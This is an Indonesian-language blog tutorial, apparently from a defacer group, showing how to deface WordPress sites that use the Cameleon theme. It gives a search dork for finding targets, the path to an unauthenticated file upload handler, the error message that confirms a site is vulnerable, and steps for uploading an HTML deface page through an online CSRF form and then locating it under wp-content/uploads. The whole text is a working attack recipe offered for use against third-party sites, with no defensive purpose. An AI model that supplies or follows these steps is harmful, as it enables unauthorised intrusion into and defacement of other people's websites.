Deface Wp Chameleon with CSRF

 

Hai! Gw SwipeMoon

Kali ini gw bakal memberitahu cara mendeface website metode wp chameleon

Bahan bahan :

- Dork

- Exploit

- CSRF

- Script Deface

Langkah 1 :

Pertama kalian ngedork dulu untuk mencari targetnya

Dork : inurl:/wp-content/themes/cameleon/

Contoh :

Langkah 2 :

Kalau sudah dapat target tinggal kalian Exploit!

Exploit: /wp-content/themes/cameleon/includes/fileuploader/upload_handler.php

Contoh: web.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php

Jika muncul tulisan {"error":"No files were uploaded."} berarti web itu vuln :)

Nyari CSRF ONLINE? Klik sini

Contoh  :

Langkah 3 :

Kalau sudah di Exploit dan vuln kalian salin URL nya lalu bawa ke website CSRF online, di URL TARGET masukan url yang kalian salin tadi dan POST FILE nya kalian isi qqfile kalau sudah kalian pencet target key.

Contoh :

Langkah 4 :

Kalau target sudah terkunci kalian tinggal upload script deface kalian yang berekstensi .html , lalu pencet fire

Contoh :

Kalau sudah pencet fire dan ada tulisan seperti foto dibawah ini berarti sudah berhasil di upload !

Nah sekarang tinggal mengakses script deface kita 

Cara mengakses :

/wp-content/uploads/tahun/bulan/namasckalian.html

Contoh :

web.com/wp-content/uploads/2020/12/lol.html

Alhasil web pun terdeface walaupun ga tebas index :b

Sekian aja artikel dari gw

Best Regards,

SwipeMoon

ForceCyberTeam

Bagikan Artikel ini